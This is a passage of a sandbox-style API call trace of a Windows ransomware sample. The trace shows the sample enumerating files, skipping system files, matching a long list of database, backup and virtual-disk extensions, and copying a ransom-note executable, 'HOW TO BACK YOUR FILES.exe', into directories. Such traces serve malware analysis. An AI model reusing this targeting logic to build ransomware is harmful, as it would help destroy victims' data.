[0041.844] lstrcmpiW (lpString1="tore", lpString2="rctd") returned 1 [0041.844] lstrlenW (lpString="rod") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="rod") returned -1 [0041.844] lstrlenW (lpString="rodx") returned 4 [0041.844] lstrcmpiW (lpString1="tore", lpString2="rodx") returned 1 [0041.844] lstrlenW (lpString="rpd") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="rpd") returned -1 [0041.844] lstrlenW (lpString="rsd") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="rsd") returned -1 [0041.844] lstrlenW (lpString="sas7bdat") returned 8 [0041.844] lstrcmpiW (lpString1="ageStore", lpString2="sas7bdat") returned -1 [0041.844] lstrlenW (lpString="sbf") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="sbf") returned -1 [0041.844] lstrlenW (lpString="scx") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="scx") returned -1 [0041.844] lstrlenW (lpString="sdb") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="sdb") returned -1 [0041.844] lstrlenW (lpString="sdc") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="sdc") returned -1 [0041.844] lstrlenW (lpString="sdf") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="sdf") returned -1 [0041.844] lstrlenW (lpString="sis") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="sis") returned -1 [0041.844] lstrlenW (lpString="spq") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="spq") returned -1 [0041.844] lstrlenW (lpString="te") returned 2 [0041.844] lstrcmpiW (lpString1="re", lpString2="te") returned -1 [0041.844] lstrlenW (lpString="teacher") returned 7 [0041.844] lstrcmpiW (lpString1="geStore", lpString2="teacher") returned -1 [0041.845] lstrlenW (lpString="tmd") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="tmd") returned -1 [0041.845] lstrlenW (lpString="tps") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="tps") returned -1 [0041.845] lstrlenW (lpString="trc") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="trc") returned -1 [0041.845] lstrlenW (lpString="trc") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="trc") returned -1 [0041.845] lstrlenW (lpString="trm") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="trm") returned -1 [0041.845] lstrlenW (lpString="udb") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="udb") returned -1 [0041.845] lstrlenW (lpString="udl") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="udl") returned -1 [0041.845] lstrlenW (lpString="usr") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="usr") returned -1 [0041.845] lstrlenW (lpString="v12") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="v12") returned -1 [0041.845] lstrlenW (lpString="vis") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="vis") returned -1 [0041.845] lstrlenW (lpString="vpd") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="vpd") returned -1 [0041.845] lstrlenW (lpString="vvv") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="vvv") returned -1 [0041.845] lstrlenW (lpString="wdb") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="wdb") returned -1 [0041.845] lstrlenW (lpString="wmdb") returned 4 [0041.845] lstrcmpiW (lpString1="tore", lpString2="wmdb") returned -1 [0041.845] lstrlenW (lpString="wrk") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="wrk") returned -1 [0041.845] lstrlenW (lpString="xdb") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="xdb") returned -1 [0041.845] lstrlenW (lpString="xld") returned 3 [0041.845] lstrcmpiW (lpString1="ore", lpString2="xld") returned -1 [0041.845] lstrlenW (lpString="xmlff") returned 5 [0041.845] lstrcmpiW (lpString1="Store", lpString2="xmlff") returned -1 [0041.846] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2e234eb, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="aoldtz.exe") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="..") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="windows") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="bootmgr") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="temp") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="pagefile.sys") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="boot") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="ids.txt") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="ntuser.dat") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="perflogs") returned 1 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="MSBuild") returned 1 [0041.846] lstrlenW (lpString="WindowsMail.pat") returned 15 [0041.846] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 86 [0041.846] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") returned="WindowsMail.pat" [0041.846] lstrlenW (lpString="WindowsMail.pat") returned 15 [0041.846] lstrlenW (lpString="Ares865") returned 7 [0041.846] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0041.846] lstrlenW (lpString=".dll") returned 4 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".dll") returned 1 [0041.846] lstrlenW (lpString=".lnk") returned 4 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".lnk") returned 1 [0041.846] lstrlenW (lpString=".ini") returned 4 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".ini") returned 1 [0041.846] lstrlenW (lpString=".sys") returned 4 [0041.846] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".sys") returned 1 [0041.846] lstrlenW (lpString="WindowsMail.pat") returned 15 [0041.846] lstrlenW (lpString="bak") returned 3 [0041.846] lstrcmpiW (lpString1="pat", lpString2="bak") returned 1 [0041.846] lstrlenW (lpString="ba_") returned 3 [0041.846] lstrcmpiW (lpString1="pat", lpString2="ba_") returned 1 [0041.846] lstrlenW (lpString="dbb") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="dbb") returned 1 [0041.847] lstrlenW (lpString="vmdk") returned 4 [0041.847] lstrcmpiW (lpString1=".pat", lpString2="vmdk") returned -1 [0041.847] lstrlenW (lpString="rar") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="rar") returned -1 [0041.847] lstrlenW (lpString="zip") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="zip") returned -1 [0041.847] lstrlenW (lpString="tgz") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="tgz") returned -1 [0041.847] lstrlenW (lpString="vbox") returned 4 [0041.847] lstrcmpiW (lpString1=".pat", lpString2="vbox") returned -1 [0041.847] lstrlenW (lpString="vdi") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="vdi") returned -1 [0041.847] lstrlenW (lpString="vhd") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="vhd") returned -1 [0041.847] lstrlenW (lpString="vhdx") returned 4 [0041.847] lstrcmpiW (lpString1=".pat", lpString2="vhdx") returned -1 [0041.847] lstrlenW (lpString="avhd") returned 4 [0041.847] lstrcmpiW (lpString1=".pat", lpString2="avhd") returned -1 [0041.847] lstrlenW (lpString="db") returned 2 [0041.847] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0041.847] lstrlenW (lpString="db2") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="db2") returned 1 [0041.847] lstrlenW (lpString="db3") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="db3") returned 1 [0041.847] lstrlenW (lpString="dbf") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="dbf") returned 1 [0041.847] lstrlenW (lpString="mdf") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="mdf") returned 1 [0041.847] lstrlenW (lpString="mdb") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="mdb") returned 1 [0041.847] lstrlenW (lpString="sql") returned 3 [0041.847] lstrcmpiW (lpString1="pat", lpString2="sql") returned -1 [0041.847] lstrlenW (lpString="sqlite") returned 6 [0041.848] lstrcmpiW (lpString1="il.pat", lpString2="sqlite") returned -1 [0041.848] lstrlenW (lpString="sqlite3") returned 7 [0041.848] lstrcmpiW (lpString1="ail.pat", lpString2="sqlite3") returned -1 [0041.848] lstrlenW (lpString="sqlitedb") returned 8 [0041.848] lstrcmpiW (lpString1="Mail.pat", lpString2="sqlitedb") returned -1 [0041.848] lstrlenW (lpString="xml") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="xml") returned -1 [0041.848] lstrlenW (lpString="$er") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="$er") returned 1 [0041.848] lstrlenW (lpString="4dd") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="4dd") returned 1 [0041.848] lstrlenW (lpString="4dl") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="4dl") returned 1 [0041.848] lstrlenW (lpString="^^^") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="^^^") returned 1 [0041.848] lstrlenW (lpString="abs") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="abs") returned 1 [0041.848] lstrlenW (lpString="abx") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="abx") returned 1 [0041.848] lstrlenW (lpString="accdb") returned 5 [0041.848] lstrcmpiW (lpString1="l.pat", lpString2="accdb") returned 1 [0041.848] lstrlenW (lpString="accdc") returned 5 [0041.848] lstrcmpiW (lpString1="l.pat", lpString2="accdc") returned 1 [0041.848] lstrlenW (lpString="accde") returned 5 [0041.848] lstrcmpiW (lpString1="l.pat", lpString2="accde") returned 1 [0041.848] lstrlenW (lpString="accdr") returned 5 [0041.848] lstrcmpiW (lpString1="l.pat", lpString2="accdr") returned 1 [0041.848] lstrlenW (lpString="accdt") returned 5 [0041.848] lstrcmpiW (lpString1="l.pat", lpString2="accdt") returned 1 [0041.848] lstrlenW (lpString="accdw") returned 5 [0041.848] lstrcmpiW (lpString1="l.pat", lpString2="accdw") returned 1 [0041.848] lstrlenW (lpString="accft") returned 5 [0041.848] lstrcmpiW (lpString1="l.pat", lpString2="accft") returned 1 [0041.848] lstrlenW (lpString="adb") returned 3 [0041.848] lstrcmpiW (lpString1="pat", lpString2="adb") returned 1 [0041.849] lstrlenW (lpString="adb") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="adb") returned 1 [0041.849] lstrlenW (lpString="ade") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="ade") returned 1 [0041.849] lstrlenW (lpString="adf") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="adf") returned 1 [0041.849] lstrlenW (lpString="adn") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="adn") returned 1 [0041.849] lstrlenW (lpString="adp") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="adp") returned 1 [0041.849] lstrlenW (lpString="alf") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="alf") returned 1 [0041.849] lstrlenW (lpString="ask") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="ask") returned 1 [0041.849] lstrlenW (lpString="btr") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="btr") returned 1 [0041.849] lstrlenW (lpString="cat") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="cat") returned 1 [0041.849] lstrlenW (lpString="cdb") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="cdb") returned 1 [0041.849] lstrlenW (lpString="ckp") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="ckp") returned 1 [0041.849] lstrlenW (lpString="cma") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="cma") returned 1 [0041.849] lstrlenW (lpString="cpd") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="cpd") returned 1 [0041.849] lstrlenW (lpString="dacpac") returned 6 [0041.849] lstrcmpiW (lpString1="il.pat", lpString2="dacpac") returned 1 [0041.849] lstrlenW (lpString="dad") returned 3 [0041.849] lstrcmpiW (lpString1="pat", lpString2="dad") returned 1 [0041.849] lstrlenW (lpString="dadiagrams") returned 10 [0041.849] lstrcmpiW (lpString1="wsMail.pat", lpString2="dadiagrams") returned 1 [0041.849] lstrlenW (lpString="daschema") returned 8 [0041.849] lstrcmpiW (lpString1="Mail.pat", lpString2="daschema") returned 1 [0041.850] lstrlenW (lpString="db-journal") returned 10 [0041.850] lstrcmpiW (lpString1="wsMail.pat", lpString2="db-journal") returned 1 [0041.850] lstrlenW (lpString="db-shm") returned 6 [0041.850] lstrcmpiW (lpString1="il.pat", lpString2="db-shm") returned 1 [0041.850] lstrlenW (lpString="db-wal") returned 6 [0041.850] lstrcmpiW (lpString1="il.pat", lpString2="db-wal") returned 1 [0041.850] lstrlenW (lpString="dbc") returned 3 [0041.850] lstrcmpiW (lpString1="pat", lpString2="dbc") returned 1 [0041.850] lstrlenW (lpString="dbs") returned 3 [0041.850] lstrcmpiW (lpString1="pat", lpString2="dbs") returned 1 [0041.850] lstrlenW (lpString="dbt") returned 3 [0041.850] lstrcmpiW (lpString1="pat", lpString2="dbt") returned 1 [0041.850] lstrlenW (lpString="dbv") returned 3 [0041.850] lstrcmpiW (lpString1="pat", lpString2="dbv") returned 1 [0041.850] lstrlenW (lpString="dbx") returned 3 [0041.850] lstrcmpiW (lpString1="pat", lpString2="dbx") returned 1 [0041.850] lstrlenW (lpString="dcb") returned 3 [0041.850] lstrcmpiW (lpString1="pat", lpString2="dcb") returned 1 [0041.850] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" [0041.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0041.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0041.850] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned 70 [0041.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" [0041.850] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.850] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.856] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.856] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0041.857] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.857] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.857] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.857] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.857] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.857] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.857] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.857] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.857] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xcdfff30e, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="aoldtz.exe") returned 1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2=".") returned 1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="..") returned 1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="windows") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="bootmgr") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="temp") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="pagefile.sys") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="boot") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="ids.txt") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="ntuser.dat") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="perflogs") returned -1 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2="MSBuild") returned -1 [0041.857] lstrlenW (lpString="Bears.htm") returned 9 [0041.857] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\*") returned 72 [0041.857] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Bears.htm" | out: lpString1="Bears.htm") returned="Bears.htm" [0041.857] lstrlenW (lpString="Bears.htm") returned 9 [0041.857] lstrlenW (lpString="Ares865") returned 7 [0041.857] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0041.857] lstrlenW (lpString=".dll") returned 4 [0041.857] lstrcmpiW (lpString1="Bears.htm", lpString2=".dll") returned 1 [0041.858] lstrlenW (lpString=".lnk") returned 4 [0041.858] lstrcmpiW (lpString1="Bears.htm", lpString2=".lnk") returned 1 [0041.858] lstrlenW (lpString=".ini") returned 4 [0041.858] lstrcmpiW (lpString1="Bears.htm", lpString2=".ini") returned 1 [0041.858] lstrlenW (lpString=".sys") returned 4 [0041.858] lstrcmpiW (lpString1="Bears.htm", lpString2=".sys") returned 1 [0041.858] lstrlenW (lpString="Bears.htm") returned 9 [0041.858] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Bears.jpg" | out: lpString1="Bears.jpg") returned="Bears.jpg" [0041.858] lstrlenW (lpString="Bears.jpg") returned 9 [0041.858] lstrlenW (lpString="Ares865") returned 7 [0041.858] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0041.858] lstrlenW (lpString=".dll") returned 4 [0041.858] lstrcmpiW (lpString1="Bears.jpg", lpString2=".dll") returned 1 [0041.858] lstrlenW (lpString=".lnk") returned 4 [0041.858] lstrcmpiW (lpString1="Bears.jpg", lpString2=".lnk") returned 1 [0041.858] lstrlenW (lpString=".ini") returned 4 [0041.858] lstrcmpiW (lpString1="Bears.jpg", lpString2=".ini") returned 1 [0041.858] lstrlenW (lpString=".sys") returned 4 [0041.858] lstrcmpiW (lpString1="Bears.jpg", lpString2=".sys") returned 1 [0041.858] lstrlenW (lpString="Bears.jpg") returned 9 [0041.858] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0041.858] lstrlenW (lpString="Desktop.ini") returned 11 [0041.858] lstrlenW (lpString="Ares865") returned 7 [0041.858] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.858] lstrlenW (lpString=".dll") returned 4 [0041.858] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0041.858] lstrlenW (lpString=".lnk") returned 4 [0041.858] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0041.858] lstrlenW (lpString=".ini") returned 4 [0041.858] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0041.858] lstrlenW (lpString=".sys") returned 4 [0041.859] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0041.859] lstrlenW (lpString="Desktop.ini") returned 11 [0041.859] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Garden.htm" | out: lpString1="Garden.htm") returned="Garden.htm" [0041.859] lstrlenW (lpString="Garden.htm") returned 10 [0041.859] lstrlenW (lpString="Ares865") returned 7 [0041.859] lstrcmpiW (lpString1="den.htm", lpString2="Ares865") returned 1 [0041.859] lstrlenW (lpString=".dll") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.htm", lpString2=".dll") returned 1 [0041.859] lstrlenW (lpString=".lnk") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.htm", lpString2=".lnk") returned 1 [0041.859] lstrlenW (lpString=".ini") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.htm", lpString2=".ini") returned 1 [0041.859] lstrlenW (lpString=".sys") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.htm", lpString2=".sys") returned 1 [0041.859] lstrlenW (lpString="Garden.htm") returned 10 [0041.859] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Garden.jpg" | out: lpString1="Garden.jpg") returned="Garden.jpg" [0041.859] lstrlenW (lpString="Garden.jpg") returned 10 [0041.859] lstrlenW (lpString="Ares865") returned 7 [0041.859] lstrcmpiW (lpString1="den.jpg", lpString2="Ares865") returned 1 [0041.859] lstrlenW (lpString=".dll") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.jpg", lpString2=".dll") returned 1 [0041.859] lstrlenW (lpString=".lnk") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.jpg", lpString2=".lnk") returned 1 [0041.859] lstrlenW (lpString=".ini") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.jpg", lpString2=".ini") returned 1 [0041.859] lstrlenW (lpString=".sys") returned 4 [0041.859] lstrcmpiW (lpString1="Garden.jpg", lpString2=".sys") returned 1 [0041.859] lstrlenW (lpString="Garden.jpg") returned 10 [0041.859] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Green Bubbles.htm" | out: lpString1="Green Bubbles.htm") returned="Green Bubbles.htm" [0041.860] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0041.860] lstrlenW (lpString="Ares865") returned 7 [0041.860] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0041.860] lstrlenW (lpString=".dll") returned 4 [0041.860] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".dll") returned 1 [0041.860] lstrlenW (lpString=".lnk") returned 4 [0041.860] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".lnk") returned 1 [0041.860] lstrlenW (lpString=".ini") returned 4 [0041.860] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".ini") returned 1 [0041.860] lstrlenW (lpString=".sys") returned 4 [0041.860] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".sys") returned 1 [0041.860] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0041.860] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="GreenBubbles.jpg" | out: lpString1="GreenBubbles.jpg") returned="GreenBubbles.jpg" [0041.860] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0041.860] lstrlenW (lpString="Ares865") returned 7 [0041.860] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0041.860] lstrlenW (lpString=".dll") returned 4 [0041.860] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".dll") returned 1 [0041.860] lstrlenW (lpString=".lnk") returned 4 [0041.860] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".lnk") returned 1 [0041.860] lstrlenW (lpString=".ini") returned 4 [0041.860] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".ini") returned 1 [0041.860] lstrlenW (lpString=".sys") returned 4 [0041.860] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".sys") returned 1 [0041.860] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0041.860] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Hand Prints.htm" | out: lpString1="Hand Prints.htm") returned="Hand Prints.htm" [0041.860] lstrlenW (lpString="Hand Prints.htm") returned 15 [0041.860] lstrlenW (lpString="Ares865") returned 7 [0041.860] lstrcmpiW (lpString1="nts.htm", lpString2="Ares865") returned 1 [0041.860] lstrlenW (lpString=".dll") returned 4 [0041.860] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".dll") returned 1 [0041.860] lstrlenW (lpString=".lnk") returned 4 [0041.861] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".lnk") returned 1 [0041.861] lstrlenW (lpString=".ini") returned 4 [0041.861] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".ini") returned 1 [0041.861] lstrlenW (lpString=".sys") returned 4 [0041.861] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".sys") returned 1 [0041.861] lstrlenW (lpString="Hand Prints.htm") returned 15 [0041.861] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="HandPrints.jpg" | out: lpString1="HandPrints.jpg") returned="HandPrints.jpg" [0041.861] lstrlenW (lpString="HandPrints.jpg") returned 14 [0041.861] lstrlenW (lpString="Ares865") returned 7 [0041.861] lstrcmpiW (lpString1="nts.jpg", lpString2="Ares865") returned 1 [0041.861] lstrlenW (lpString=".dll") returned 4 [0041.861] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".dll") returned 1 [0041.861] lstrlenW (lpString=".lnk") returned 4 [0041.861] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".lnk") returned 1 [0041.861] lstrlenW (lpString=".ini") returned 4 [0041.861] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".ini") returned 1 [0041.861] lstrlenW (lpString=".sys") returned 4 [0041.861] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".sys") returned 1 [0041.861] lstrlenW (lpString="HandPrints.jpg") returned 14 [0041.861] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Orange Circles.htm" | out: lpString1="Orange Circles.htm") returned="Orange Circles.htm" [0041.861] lstrlenW (lpString="Orange Circles.htm") returned 18 [0041.861] lstrlenW (lpString="Ares865") returned 7 [0041.861] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0041.861] lstrlenW (lpString=".dll") returned 4 [0041.861] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".dll") returned 1 [0041.861] lstrlenW (lpString=".lnk") returned 4 [0041.861] lstrcmpiW 